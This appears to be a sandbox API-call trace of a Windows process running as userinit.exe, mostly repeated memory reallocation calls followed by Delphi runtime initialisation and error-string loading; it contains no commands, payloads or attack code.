[0158.403] GlobalHandle (pMem=0x6e0820) returned 0x84000c
[0158.403] GlobalUnlock (hMem=0x84000c) returned 0
[0158.403] GlobalReAlloc (hMem=0x84000c, dwBytes=0x6e000, uFlags=0x2) returned 0x84000c
[0158.403] GlobalLock (hMem=0x84000c) returned 0x6e0820
[0158.404] GlobalHandle (pMem=0x6e0820) returned 0x84000c
[0158.404] GlobalUnlock (hMem=0x84000c) returned 0
[0158.404] GlobalReAlloc (hMem=0x84000c, dwBytes=0x70000, uFlags=0x2) returned 0x84000c
[0158.416] GlobalLock (hMem=0x84000c) returned 0x23d0048
[0158.417] GlobalHandle (pMem=0x23d0048) returned 0x84000c
[0158.417] GlobalUnlock (hMem=0x84000c) returned 0
[0158.417] GlobalReAlloc (hMem=0x84000c, dwBytes=0x72000, uFlags=0x2) returned 0x84000c
[0158.421] GlobalLock (hMem=0x84000c) returned 0x2440058
[0158.422] GlobalHandle (pMem=0x2440058) returned 0x84000c
[0158.422] GlobalUnlock (hMem=0x84000c) returned 0
[0158.422] GlobalReAlloc (hMem=0x84000c, dwBytes=0x74000, uFlags=0x2) returned 0x84000c
[0158.422] GlobalLock (hMem=0x84000c) returned 0x2440058
[0158.423] GlobalHandle (pMem=0x2440058) returned 0x84000c
[0158.423] GlobalUnlock (hMem=0x84000c) returned 0
[0158.423] GlobalReAlloc (hMem=0x84000c, dwBytes=0x76000, uFlags=0x2) returned 0x84000c
[0158.483] GlobalLock (hMem=0x84000c) returned 0x676810
[0158.483] GlobalHandle (pMem=0x676810) returned 0x84000c
[0158.483] GlobalUnlock (hMem=0x84000c) returned 0
[0158.483] GlobalReAlloc (hMem=0x84000c, dwBytes=0x78000, uFlags=0x2) returned 0x84000c
[0158.487] GlobalLock (hMem=0x84000c) returned 0x23d0048
[0158.488] GlobalHandle (pMem=0x23d0048) returned 0x84000c
[0158.488] GlobalUnlock (hMem=0x84000c) returned 0
[0158.488] GlobalReAlloc (hMem=0x84000c, dwBytes=0x7a000, uFlags=0x2) returned 0x84000c
[0158.493] GlobalLock (hMem=0x84000c) returned 0x2448058
[0158.494] GlobalHandle (pMem=0x2448058) returned 0x84000c
[0158.494] GlobalUnlock (hMem=0x84000c) returned 0
[0158.494] GlobalReAlloc (hMem=0x84000c, dwBytes=0x7c000, uFlags=0x2) returned 0x84000c
[0158.494] GlobalLock (hMem=0x84000c) returned 0x2448058
[0158.494] GlobalHandle (pMem=0x2448058) returned 0x84000c
[0158.494] GlobalUnlock (hMem=0x84000c) returned 0
[0158.494] GlobalReAlloc (hMem=0x84000c, dwBytes=0x7e000, uFlags=0x2) returned 0x84000c
[0158.508] GlobalLock (hMem=0x84000c) returned 0x24d0048
[0158.509] GlobalHandle (pMem=0x24d0048) returned 0x84000c
[0158.509] GlobalUnlock (hMem=0x84000c) returned 0
[0158.509] GlobalReAlloc (hMem=0x84000c, dwBytes=0x80000, uFlags=0x2) returned 0x84000c
[0158.570] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.571] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.571] GlobalUnlock (hMem=0x84000c) returned 0
[0158.571] GlobalReAlloc (hMem=0x84000c, dwBytes=0x82000, uFlags=0x2) returned 0x84000c
[0158.580] GlobalLock (hMem=0x84000c) returned 0x2760020
[0158.581] GlobalHandle (pMem=0x2760020) returned 0x84000c
[0158.581] GlobalUnlock (hMem=0x84000c) returned 0
[0158.581] GlobalReAlloc (hMem=0x84000c, dwBytes=0x84000, uFlags=0x2) returned 0x84000c
[0158.590] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.591] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.591] GlobalUnlock (hMem=0x84000c) returned 0
[0158.591] GlobalReAlloc (hMem=0x84000c, dwBytes=0x86000, uFlags=0x2) returned 0x84000c
[0158.600] GlobalLock (hMem=0x84000c) returned 0x2760020
[0158.601] GlobalHandle (pMem=0x2760020) returned 0x84000c
[0158.601] GlobalUnlock (hMem=0x84000c) returned 0
[0158.601] GlobalReAlloc (hMem=0x84000c, dwBytes=0x88000, uFlags=0x2) returned 0x84000c
[0158.611] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.612] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.612] GlobalUnlock (hMem=0x84000c) returned 0
[0158.612] GlobalReAlloc (hMem=0x84000c, dwBytes=0x8a000, uFlags=0x2) returned 0x84000c
[0158.669] GlobalLock (hMem=0x84000c) returned 0x2760020
[0158.670] GlobalHandle (pMem=0x2760020) returned 0x84000c
[0158.670] GlobalUnlock (hMem=0x84000c) returned 0
[0158.670] GlobalReAlloc (hMem=0x84000c, dwBytes=0x8c000, uFlags=0x2) returned 0x84000c
[0158.679] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.681] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.681] GlobalUnlock (hMem=0x84000c) returned 0
[0158.681] GlobalReAlloc (hMem=0x84000c, dwBytes=0x8e000, uFlags=0x2) returned 0x84000c
[0158.690] GlobalLock (hMem=0x84000c) returned 0x2760020
[0158.691] GlobalHandle (pMem=0x2760020) returned 0x84000c
[0158.691] GlobalUnlock (hMem=0x84000c) returned 0
[0158.691] GlobalReAlloc (hMem=0x84000c, dwBytes=0x90000, uFlags=0x2) returned 0x84000c
[0158.702] GlobalLock (hMem=0x84000c) returned 0x27f0020
[0158.703] GlobalHandle (pMem=0x27f0020) returned 0x84000c
[0158.703] GlobalUnlock (hMem=0x84000c) returned 0
[0158.703] GlobalReAlloc (hMem=0x84000c, dwBytes=0x92000, uFlags=0x2) returned 0x84000c
[0158.760] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.761] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.761] GlobalUnlock (hMem=0x84000c) returned 0
[0158.761] GlobalReAlloc (hMem=0x84000c, dwBytes=0x94000, uFlags=0x2) returned 0x84000c
[0158.771] GlobalLock (hMem=0x84000c) returned 0x2770020
[0158.772] GlobalHandle (pMem=0x2770020) returned 0x84000c
[0158.772] GlobalUnlock (hMem=0x84000c) returned 0
[0158.772] GlobalReAlloc (hMem=0x84000c, dwBytes=0x96000, uFlags=0x2) returned 0x84000c
[0158.783] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.783] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.783] GlobalUnlock (hMem=0x84000c) returned 0
[0158.783] GlobalReAlloc (hMem=0x84000c, dwBytes=0x98000, uFlags=0x2) returned 0x84000c
[0158.794] GlobalLock (hMem=0x84000c) returned 0x2770020
[0158.795] GlobalHandle (pMem=0x2770020) returned 0x84000c
[0158.795] GlobalUnlock (hMem=0x84000c) returned 0
[0158.795] GlobalReAlloc (hMem=0x84000c, dwBytes=0x9a000, uFlags=0x2) returned 0x84000c
[0158.875] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.876] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.876] GlobalUnlock (hMem=0x84000c) returned 0
[0158.876] GlobalReAlloc (hMem=0x84000c, dwBytes=0x9c000, uFlags=0x2) returned 0x84000c
[0158.887] GlobalLock (hMem=0x84000c) returned 0x2770020
[0158.888] GlobalHandle (pMem=0x2770020) returned 0x84000c
[0158.888] GlobalUnlock (hMem=0x84000c) returned 0
[0158.888] GlobalReAlloc (hMem=0x84000c, dwBytes=0x9e000, uFlags=0x2) returned 0x84000c
[0158.900] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.901] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.901] GlobalUnlock (hMem=0x84000c) returned 0
[0158.901] GlobalReAlloc (hMem=0x84000c, dwBytes=0xa0000, uFlags=0x2) returned 0x84000c
[0158.960] GlobalLock (hMem=0x84000c) returned 0x2770020
[0158.961] GlobalHandle (pMem=0x2770020) returned 0x84000c
[0158.961] GlobalUnlock (hMem=0x84000c) returned 0
[0158.961] GlobalReAlloc (hMem=0x84000c, dwBytes=0xa2000, uFlags=0x2) returned 0x84000c
[0158.973] GlobalLock (hMem=0x84000c) returned 0x2820020
[0158.973] GlobalHandle (pMem=0x2820020) returned 0x84000c
[0158.973] GlobalUnlock (hMem=0x84000c) returned 0
[0158.973] GlobalReAlloc (hMem=0x84000c, dwBytes=0xa4000, uFlags=0x2) returned 0x84000c
[0158.985] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0158.986] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0158.986] GlobalUnlock (hMem=0x84000c) returned 0
[0158.986] GlobalReAlloc (hMem=0x84000c, dwBytes=0xa6000, uFlags=0x2) returned 0x84000c
[0159.055] GlobalLock (hMem=0x84000c) returned 0x2780020
[0159.055] GlobalHandle (pMem=0x2780020) returned 0x84000c
[0159.055] GlobalUnlock (hMem=0x84000c) returned 0
[0159.055] GlobalReAlloc (hMem=0x84000c, dwBytes=0xa8000, uFlags=0x2) returned 0x84000c
[0159.067] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.067] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.068] GlobalUnlock (hMem=0x84000c) returned 0
[0159.068] GlobalReAlloc (hMem=0x84000c, dwBytes=0xaa000, uFlags=0x2) returned 0x84000c
[0159.079] GlobalLock (hMem=0x84000c) returned 0x2780020
[0159.080] GlobalHandle (pMem=0x2780020) returned 0x84000c
[0159.080] GlobalUnlock (hMem=0x84000c) returned 0
[0159.080] GlobalReAlloc (hMem=0x84000c, dwBytes=0xac000, uFlags=0x2) returned 0x84000c
[0159.092] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.093] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.093] GlobalUnlock (hMem=0x84000c) returned 0
[0159.093] GlobalReAlloc (hMem=0x84000c, dwBytes=0xae000, uFlags=0x2) returned 0x84000c
[0159.153] GlobalLock (hMem=0x84000c) returned 0x2780020
[0159.153] GlobalHandle (pMem=0x2780020) returned 0x84000c
[0159.153] GlobalUnlock (hMem=0x84000c) returned 0
[0159.153] GlobalReAlloc (hMem=0x84000c, dwBytes=0xb0000, uFlags=0x2) returned 0x84000c
[0159.165] GlobalLock (hMem=0x84000c) returned 0x2830020
[0159.166] GlobalHandle (pMem=0x2830020) returned 0x84000c
[0159.166] GlobalUnlock (hMem=0x84000c) returned 0
[0159.166] GlobalReAlloc (hMem=0x84000c, dwBytes=0xb2000, uFlags=0x2) returned 0x84000c
[0159.179] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.180] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.180] GlobalUnlock (hMem=0x84000c) returned 0
[0159.180] GlobalReAlloc (hMem=0x84000c, dwBytes=0xb4000, uFlags=0x2) returned 0x84000c
[0159.191] GlobalLock (hMem=0x84000c) returned 0x2790020
[0159.239] GlobalHandle (pMem=0x2790020) returned 0x84000c
[0159.239] GlobalUnlock (hMem=0x84000c) returned 0
[0159.240] GlobalReAlloc (hMem=0x84000c, dwBytes=0xb6000, uFlags=0x2) returned 0x84000c
[0159.260] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.261] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.261] GlobalUnlock (hMem=0x84000c) returned 0
[0159.261] GlobalReAlloc (hMem=0x84000c, dwBytes=0xb8000, uFlags=0x2) returned 0x84000c
[0159.275] GlobalLock (hMem=0x84000c) returned 0x2790020
[0159.276] GlobalHandle (pMem=0x2790020) returned 0x84000c
[0159.276] GlobalUnlock (hMem=0x84000c) returned 0
[0159.276] GlobalReAlloc (hMem=0x84000c, dwBytes=0xba000, uFlags=0x2) returned 0x84000c
[0159.337] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.338] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.338] GlobalUnlock (hMem=0x84000c) returned 0
[0159.338] GlobalReAlloc (hMem=0x84000c, dwBytes=0xbc000, uFlags=0x2) returned 0x84000c
[0159.351] GlobalLock (hMem=0x84000c) returned 0x2790020
[0159.351] GlobalHandle (pMem=0x2790020) returned 0x84000c
[0159.351] GlobalUnlock (hMem=0x84000c) returned 0
[0159.351] GlobalReAlloc (hMem=0x84000c, dwBytes=0xbe000, uFlags=0x2) returned 0x84000c
[0159.364] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.365] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.365] GlobalUnlock (hMem=0x84000c) returned 0
[0159.365] GlobalReAlloc (hMem=0x84000c, dwBytes=0xc0000, uFlags=0x2) returned 0x84000c
[0159.378] GlobalLock (hMem=0x84000c) returned 0x2790020
[0159.425] GlobalHandle (pMem=0x2790020) returned 0x84000c
[0159.425] GlobalUnlock (hMem=0x84000c) returned 0
[0159.426] GlobalReAlloc (hMem=0x84000c, dwBytes=0xc2000, uFlags=0x2) returned 0x84000c
[0159.438] GlobalLock (hMem=0x84000c) returned 0x2860020
[0159.439] GlobalHandle (pMem=0x2860020) returned 0x84000c
[0159.439] GlobalUnlock (hMem=0x84000c) returned 0
[0159.439] GlobalReAlloc (hMem=0x84000c, dwBytes=0xc4000, uFlags=0x2) returned 0x84000c
[0159.452] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.453] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.453] GlobalUnlock (hMem=0x84000c) returned 0
[0159.453] GlobalReAlloc (hMem=0x84000c, dwBytes=0xc6000, uFlags=0x2) returned 0x84000c
[0159.467] GlobalLock (hMem=0x84000c) returned 0x27a0020
[0159.468] GlobalHandle (pMem=0x27a0020) returned 0x84000c
[0159.468] GlobalUnlock (hMem=0x84000c) returned 0
[0159.468] GlobalReAlloc (hMem=0x84000c, dwBytes=0xc8000, uFlags=0x2) returned 0x84000c
[0159.533] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.534] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.534] GlobalUnlock (hMem=0x84000c) returned 0
[0159.534] GlobalReAlloc (hMem=0x84000c, dwBytes=0xca000, uFlags=0x2) returned 0x84000c
[0159.551] GlobalLock (hMem=0x84000c) returned 0x27a0020
[0159.552] GlobalHandle (pMem=0x27a0020) returned 0x84000c
[0159.552] GlobalUnlock (hMem=0x84000c) returned 0
[0159.552] GlobalReAlloc (hMem=0x84000c, dwBytes=0xcc000, uFlags=0x2) returned 0x84000c
[0159.615] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.616] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.616] GlobalUnlock (hMem=0x84000c) returned 0
[0159.616] GlobalReAlloc (hMem=0x84000c, dwBytes=0xce000, uFlags=0x2) returned 0x84000c
[0159.629] GlobalLock (hMem=0x84000c) returned 0x27a0020
[0159.630] GlobalHandle (pMem=0x27a0020) returned 0x84000c
[0159.631] GlobalUnlock (hMem=0x84000c) returned 0
[0159.631] GlobalReAlloc (hMem=0x84000c, dwBytes=0xd0000, uFlags=0x2) returned 0x84000c
[0159.645] GlobalLock (hMem=0x84000c) returned 0x2870020
[0159.646] GlobalHandle (pMem=0x2870020) returned 0x84000c
[0159.646] GlobalUnlock (hMem=0x84000c) returned 0
[0159.646] GlobalReAlloc (hMem=0x84000c, dwBytes=0xd2000, uFlags=0x2) returned 0x84000c
[0159.708] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.708] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.708] GlobalUnlock (hMem=0x84000c) returned 0
[0159.708] GlobalReAlloc (hMem=0x84000c, dwBytes=0xd4000, uFlags=0x2) returned 0x84000c
[0159.723] GlobalLock (hMem=0x84000c) returned 0x27b0020
[0159.724] GlobalHandle (pMem=0x27b0020) returned 0x84000c
[0159.724] GlobalUnlock (hMem=0x84000c) returned 0
[0159.724] GlobalReAlloc (hMem=0x84000c, dwBytes=0xd6000, uFlags=0x2) returned 0x84000c
[0159.738] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.739] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.740] GlobalUnlock (hMem=0x84000c) returned 0
[0159.740] GlobalReAlloc (hMem=0x84000c, dwBytes=0xd8000, uFlags=0x2) returned 0x84000c
[0159.801] GlobalLock (hMem=0x84000c) returned 0x27b0020
[0159.802] GlobalHandle (pMem=0x27b0020) returned 0x84000c
[0159.802] GlobalUnlock (hMem=0x84000c) returned 0
[0159.802] GlobalReAlloc (hMem=0x84000c, dwBytes=0xda000, uFlags=0x2) returned 0x84000c
[0159.817] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.818] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.818] GlobalUnlock (hMem=0x84000c) returned 0
[0159.818] GlobalReAlloc (hMem=0x84000c, dwBytes=0xdc000, uFlags=0x2) returned 0x84000c
[0159.833] GlobalLock (hMem=0x84000c) returned 0x27b0020
[0159.833] GlobalHandle (pMem=0x27b0020) returned 0x84000c
[0159.833] GlobalUnlock (hMem=0x84000c) returned 0
[0159.833] GlobalReAlloc (hMem=0x84000c, dwBytes=0xde000, uFlags=0x2) returned 0x84000c
[0159.896] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.896] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.896] GlobalUnlock (hMem=0x84000c) returned 0
[0159.896] GlobalReAlloc (hMem=0x84000c, dwBytes=0xe0000, uFlags=0x2) returned 0x84000c
[0159.912] GlobalLock (hMem=0x84000c) returned 0x27b0020
[0159.913] GlobalHandle (pMem=0x27b0020) returned 0x84000c
[0159.913] GlobalUnlock (hMem=0x84000c) returned 0
[0159.913] GlobalReAlloc (hMem=0x84000c, dwBytes=0xe2000, uFlags=0x2) returned 0x84000c
[0159.929] GlobalLock (hMem=0x84000c) returned 0x28a0020
[0159.930] GlobalHandle (pMem=0x28a0020) returned 0x84000c
[0159.930] GlobalUnlock (hMem=0x84000c) returned 0
[0159.930] GlobalReAlloc (hMem=0x84000c, dwBytes=0xe4000, uFlags=0x2) returned 0x84000c
[0159.952] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0159.953] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0159.953] GlobalUnlock (hMem=0x84000c) returned 0
[0159.953] GlobalReAlloc (hMem=0x84000c, dwBytes=0xe6000, uFlags=0x2) returned 0x84000c
[0159.972] GlobalLock (hMem=0x84000c) returned 0x27c0020
[0159.973] GlobalHandle (pMem=0x27c0020) returned 0x84000c
[0159.973] GlobalUnlock (hMem=0x84000c) returned 0
[0159.973] GlobalReAlloc (hMem=0x84000c, dwBytes=0xe8000, uFlags=0x2) returned 0x84000c
[0160.034] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.035] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.035] GlobalUnlock (hMem=0x84000c) returned 0
[0160.035] GlobalReAlloc (hMem=0x84000c, dwBytes=0xea000, uFlags=0x2) returned 0x84000c
[0160.051] GlobalLock (hMem=0x84000c) returned 0x27c0020
[0160.052] GlobalHandle (pMem=0x27c0020) returned 0x84000c
[0160.052] GlobalUnlock (hMem=0x84000c) returned 0
[0160.052] GlobalReAlloc (hMem=0x84000c, dwBytes=0xec000, uFlags=0x2) returned 0x84000c
[0160.108] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.109] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.109] GlobalUnlock (hMem=0x84000c) returned 0
[0160.109] GlobalReAlloc (hMem=0x84000c, dwBytes=0xee000, uFlags=0x2) returned 0x84000c
[0160.125] GlobalLock (hMem=0x84000c) returned 0x27c0020
[0160.126] GlobalHandle (pMem=0x27c0020) returned 0x84000c
[0160.126] GlobalUnlock (hMem=0x84000c) returned 0
[0160.126] GlobalReAlloc (hMem=0x84000c, dwBytes=0xf0000, uFlags=0x2) returned 0x84000c
[0160.142] GlobalLock (hMem=0x84000c) returned 0x28b0020
[0160.176] GlobalHandle (pMem=0x28b0020) returned 0x84000c
[0160.176] GlobalUnlock (hMem=0x84000c) returned 0
[0160.176] GlobalReAlloc (hMem=0x84000c, dwBytes=0xf2000, uFlags=0x2) returned 0x84000c
[0160.192] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.193] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.193] GlobalUnlock (hMem=0x84000c) returned 0
[0160.193] GlobalReAlloc (hMem=0x84000c, dwBytes=0xf4000, uFlags=0x2) returned 0x84000c
[0160.209] GlobalLock (hMem=0x84000c) returned 0x27d0020
[0160.210] GlobalHandle (pMem=0x27d0020) returned 0x84000c
[0160.210] GlobalUnlock (hMem=0x84000c) returned 0
[0160.210] GlobalReAlloc (hMem=0x84000c, dwBytes=0xf6000, uFlags=0x2) returned 0x84000c
[0160.228] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.229] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.229] GlobalUnlock (hMem=0x84000c) returned 0
[0160.229] GlobalReAlloc (hMem=0x84000c, dwBytes=0xf8000, uFlags=0x2) returned 0x84000c
[0160.247] GlobalLock (hMem=0x84000c) returned 0x27d0020
[0160.247] GlobalHandle (pMem=0x27d0020) returned 0x84000c
[0160.247] GlobalUnlock (hMem=0x84000c) returned 0
[0160.247] GlobalReAlloc (hMem=0x84000c, dwBytes=0xfa000, uFlags=0x2) returned 0x84000c
[0160.264] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.265] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.265] GlobalUnlock (hMem=0x84000c) returned 0
[0160.265] GlobalReAlloc (hMem=0x84000c, dwBytes=0xfc000, uFlags=0x2) returned 0x84000c
[0160.301] GlobalLock (hMem=0x84000c) returned 0x27d0020
[0160.302] GlobalHandle (pMem=0x27d0020) returned 0x84000c
[0160.302] GlobalUnlock (hMem=0x84000c) returned 0
[0160.302] GlobalReAlloc (hMem=0x84000c, dwBytes=0xfe000, uFlags=0x2) returned 0x84000c
[0160.323] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.324] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.324] GlobalUnlock (hMem=0x84000c) returned 0
[0160.324] GlobalReAlloc (hMem=0x84000c, dwBytes=0x100000, uFlags=0x2) returned 0x84000c
[0160.342] GlobalLock (hMem=0x84000c) returned 0x27d0020
[0160.343] GlobalHandle (pMem=0x27d0020) returned 0x84000c
[0160.343] GlobalUnlock (hMem=0x84000c) returned 0
[0160.343] GlobalReAlloc (hMem=0x84000c, dwBytes=0x102000, uFlags=0x2) returned 0x84000c
[0160.362] GlobalLock (hMem=0x84000c) returned 0x28e0020
[0160.363] GlobalHandle (pMem=0x28e0020) returned 0x84000c
[0160.363] GlobalUnlock (hMem=0x84000c) returned 0
[0160.363] GlobalReAlloc (hMem=0x84000c, dwBytes=0x104000, uFlags=0x2) returned 0x84000c
[0160.381] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.382] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.382] GlobalUnlock (hMem=0x84000c) returned 0
[0160.382] GlobalReAlloc (hMem=0x84000c, dwBytes=0x106000, uFlags=0x2) returned 0x84000c
[0160.399] GlobalLock (hMem=0x84000c) returned 0x27e0020
[0160.400] GlobalHandle (pMem=0x27e0020) returned 0x84000c
[0160.400] GlobalUnlock (hMem=0x84000c) returned 0
[0160.400] GlobalReAlloc (hMem=0x84000c, dwBytes=0x108000, uFlags=0x2) returned 0x84000c
[0160.419] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.420] GlobalHandle (pMem=0x26d0020) returned 0x84000c
[0160.420] GlobalUnlock (hMem=0x84000c) returned 0
[0160.420] GlobalReAlloc (hMem=0x84000c, dwBytes=0x10a000, uFlags=0x2) returned 0x84000c
[0160.438] GlobalLock (hMem=0x84000c) returned 0x27e0020
[0160.439] GlobalHandle (pMem=0x27e0020) returned 0x84000c
[0160.439] GlobalUnlock (hMem=0x84000c) returned 0
[0160.439] GlobalReAlloc (hMem=0x84000c, dwBytes=0x10c000, uFlags=0x2) returned 0x84000c
[0160.458] GlobalLock (hMem=0x84000c) returned 0x26d0020
[0160.459] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x27e0000
[0160.459] VirtualAlloc (lpAddress=0x27e0000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x27e0000
[0160.492] GetKeyboardType (nTypeFlag=0) returned 4
[0160.492] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0160.492] GetStartupInfoA (in: lpStartupInfo=0x14f5d8 | out: lpStartupInfo=0x14f5d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0160.492] GetVersion () returned 0x1db10106
[0160.492] GetVersion () returned 0x1db10106
[0160.492] GetCurrentThreadId () returned 0x6f8
[0160.492] GetModuleFileNameA (in: hModule=0x28f0000, lpFilename=0x14f0d4, nSize=0x105 | out: lpFilename="\xe4\xf0\x14" (normalized: "c:\\windows\\system32\\äð\x14")) returned 0x0
[0160.493] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14efaf, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.493] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f0c4 | out: phkResult=0x14f0c4*=0x0) returned 0x2
[0160.493] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f0c4 | out: phkResult=0x14f0c4*=0x0) returned 0x2
[0160.493] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f0c4 | out: phkResult=0x14f0c4*=0x0) returned 0x2
[0160.493] lstrcpynA (in: lpString1=0x14efaf, lpString2="\xe4\xf0\x14", iMaxLength=261 | out: lpString1="\xe4\xf0\x14") returned="\xe4\xf0\x14"
[0160.493] GetThreadLocale () returned 0x409
[0160.493] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x14f0bf, cchData=5 | out: lpLCData="ENU") returned 4
[0160.493] lstrlenA (lpString="\xe4\xf0\x14") returned 3
[0160.493] LoadStringA (in: hInstance=0x28f0000, uID=0xffc4, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0160.493] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x67dcc0
[0160.493] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a10000
[0160.493] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x67ecc0
[0160.493] VirtualAlloc (lpAddress=0x2a10000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a10000
[0160.493] LoadStringA (in: hInstance=0x28f0000, uID=0xffc3, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0160.493] LoadStringA (in: hInstance=0x28f0000, uID=0xffc1, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0160.493] LoadStringA (in: hInstance=0x28f0000, uID=0xffc2, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0160.493] LoadStringA (in: hInstance=0x28f0000, uID=0xffd4, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0160.493] LoadStringA (in: hInstance=0x28f0000, uID=0xffdd, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0160.493] LoadStringA (in: hInstance=0x28f0000, uID=0xffd3, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffd0, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffd7, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffd6, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe8, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe9, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffea, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe7, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
